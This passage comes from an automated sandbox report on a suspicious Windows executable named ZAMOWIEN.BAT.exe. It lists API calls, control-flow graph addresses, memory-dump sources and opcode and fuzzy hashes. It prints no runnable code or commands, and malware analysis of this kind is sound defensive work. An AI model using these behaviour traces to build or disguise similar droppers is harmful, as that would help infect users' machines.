                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer$CountTick
                                                                            • String ID: 07y
                                                                            • API String ID: 1092082344-1660179758
                                                                            • Opcode ID: 966f60e85e5dc44348139d68e6a150ac9c8ec8ac76a809b8b3099acb9bd23891
                                                                            • Instruction ID: 56bf74c0ceca5566ff8db9fe5fa7df2a6e32981cd73e22c1ddd474f0fcee49b1
                                                                            • Opcode Fuzzy Hash: 966f60e85e5dc44348139d68e6a150ac9c8ec8ac76a809b8b3099acb9bd23891
                                                                            • Instruction Fuzzy Hash: C831B072500214EFCB209F69FE8492A3BADF74479A714423BE401B22F0DB799902CB9D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 859 4061a7-4061b3 860 4061b4-4061e8 GetTickCount GetTempFileNameW 859->860 861 4061f7-4061f9 860->861 862 4061ea-4061ec 860->862 863 4061f1-4061f4 861->863 862->860 864 4061ee 862->864 864->863
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004061C5
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403649,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935), ref: 004061E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-678247507
                                                                            • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                            • Instruction ID: c32d218b6638122aa4ce4f80c66fba6d2406c7980228c3b631cb8ccc2677eb8e
                                                                            • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                            • Instruction Fuzzy Hash: 22F09076700204BFDB008F59ED05E9AB7BCEBA5710F11803EFA01E7181E6B099548764

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 865 40337c-403389 866 4033a7-4033b0 call 403484 865->866 867 40338b-4033a1 SetFilePointer 865->867 870 4033b6-4033c9 call 4061fb 866->870 871 40347e-403481 866->871 867->866 874 40346e 870->874 875 4033cf-4033e2 call 403484 870->875 877 403470-403471 874->877 879 4033e8-4033eb 875->879 880 40347c 875->880 877->871 881 40344a-403450 879->881 882 4033ed-4033f0 879->882 880->871 883 403452 881->883 884 403455-40346c ReadFile 881->884 882->880 885 4033f6 882->885 883->884 884->874 886 403473-403476 884->886 887 4033fb-403405 885->887 886->880 888 403407 887->888 889 40340c-40341e call 4061fb 887->889 888->889 889->874 892 403420-403427 call 40622a 889->892 894 40342c-40342e 892->894 895 403430-403442 894->895 896 403446-403448 894->896 895->887 897 403444 895->897 896->877 897->880
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403328,000000FF,00000000,00000000,?,?), ref: 004033A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID: 07y
                                                                            • API String ID: 973152223-1660179758
                                                                            • Opcode ID: 45a42d16453a97052fd4caa7026d0e6d984ebdece06a60444948986a081c5d5b
                                                                            • Instruction ID: 4a37cd90d8c6e477417dc21e96f3e2d83def6ffdce0c4911f0ed58b6404d37f7
                                                                            • Opcode Fuzzy Hash: 45a42d16453a97052fd4caa7026d0e6d984ebdece06a60444948986a081c5d5b
                                                                            • Instruction Fuzzy Hash: 1D319F70101209FFDF129F95ED84A9E7FA8EB04359F20803AF905EA191D678CE51DBA9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 898 406556-406588 call 4064f5 901 4065c6 898->901 902 40658a-4065b8 RegQueryValueExW RegCloseKey 898->902 904 4065ca-4065cc 901->904 902->901 903 4065ba-4065be 902->903 903->904 905 4065c0-4065c4 903->905 905->901 905->904
                                                                            APIs
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,004067C7,80000002), ref: 0040659C
                                                                            • RegCloseKey.KERNELBASE(?,?,?), ref: 004065A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: c7bbc9debe44ed0ded3763b920631807c131ebf5032de0f94b29e3b70990b652
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: 04015A72510209FEDF218F55DD09EDB3BA8EB54364F01803AF91AA2190D738DA68DBA4

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 906 401389-40138e 907 4013fa-4013fc 906->907 908 401390-4013a0 907->908 909 4013fe 907->909 908->909 911 4013a2-4013ad call 401434 908->911 910 401400-401401 909->910 914 401404-401409 911->914 915 4013af-4013b7 call 40136d 911->915 914->910 918 4013b9-4013bb 915->918 919 4013bd-4013c2 915->919 920 4013c4-4013c9 918->920 919->920 920->907 921 4013cb-4013f4 MulDiv SendMessageW 920->921 921->907
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: d81425f99c47e39cb0b701e1691743acae5d6e146e4165746460704aa1483f0f
                                                                            • Instruction ID: 7cd7f7c50a3872a915bf5743fb7b2058cfc7604c1fd4f382db6a7ef25400a29e
                                                                            • Opcode Fuzzy Hash: d81425f99c47e39cb0b701e1691743acae5d6e146e4165746460704aa1483f0f
                                                                            • Instruction Fuzzy Hash: 3D01D1326242109BE7095B389D04B6B36A8F791315F10867AB851F62F1DA788C429B48

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 922 405bdc-405c26 CreateDirectoryW 923 405c28-405c2a 922->923 924 405c2c GetLastError 922->924 925 405c32-405c33 923->925 924->925
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00405C1E
                                                                            • GetLastError.KERNEL32 ref: 00405C2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                            • Instruction ID: 04bb8aa1cc0aca2d0eaa3ad2e941e579798f83e936e7895d473af5d327c614de
                                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                            • Instruction Fuzzy Hash: A2F0F4B0C0420DDAEF00CFA4D5487EFBBB4FB04309F00802AD541B6281D7B882088BA9
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4790,?), ref: 00405C94
                                                                            • CloseHandle.KERNEL32(?), ref: 00405CA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: 7021c5748c445b32f1b75d59fa194ddc1290dd09636498aa6d54045d02407b2e
                                                                            • Instruction ID: ce772ed75beb60998b53dc08c09fc09edba665df9f69e708b07ce0f87aa0093e
                                                                            • Opcode Fuzzy Hash: 7021c5748c445b32f1b75d59fa194ddc1290dd09636498aa6d54045d02407b2e
                                                                            • Instruction Fuzzy Hash: 21E04FF0900209BFFB009BA0ED09F7B7B6CF741204F008421BD04F2151D77898048A78
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040375B,0000000C), ref: 00406A8E
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA9
                                                                              • Part of subcall function 00406A0C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A23
                                                                              • Part of subcall function 00406A0C: wsprintfW.USER32 ref: 00406A5E
                                                                              • Part of subcall function 00406A0C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A72
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                            • Instruction ID: a8f4802470dd0b5d3fee9495424e5e46edeb2c80bdac4206b8fac7462ff861fc
                                                                            • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                            • Instruction Fuzzy Hash: 3FE08636704210AAD611A6719E48D2773AC9F86750302843EF942F2141DB38DC32AEA9
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040363E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405C3C
                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                            • Instruction ID: 16b82f8e35fddb8c9d736b627852558f5b7066616e4619afecfa9d37d551b0bb
                                                                            • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                            • Instruction Fuzzy Hash: 29C04C30648601DAEA105B719F0CB177A51BB54781F154439E582F41A4DA348455DD2D
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(00000000), ref: 6E352C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: f6d3b991cac9e7c2bc3ba79e619443bd241973ea852ffdc6ccee1e17e8ab53f4
                                                                            • Instruction ID: b39b4e152b62cbd68b34480dda920dbea9bbeb5a01ef39d9e53cc3c291e658da
                                                                            • Opcode Fuzzy Hash: f6d3b991cac9e7c2bc3ba79e619443bd241973ea852ffdc6ccee1e17e8ab53f4
                                                                            • Instruction Fuzzy Hash: 03415DB1904744EFDF119FE4DA85F9937BCEB46368F308865E80587310DB39A4A1DB91
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,00793730,0078B730,00403600,?,?,00403504,00793730,00004000,?,00000000,004033AE), ref: 0040620F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
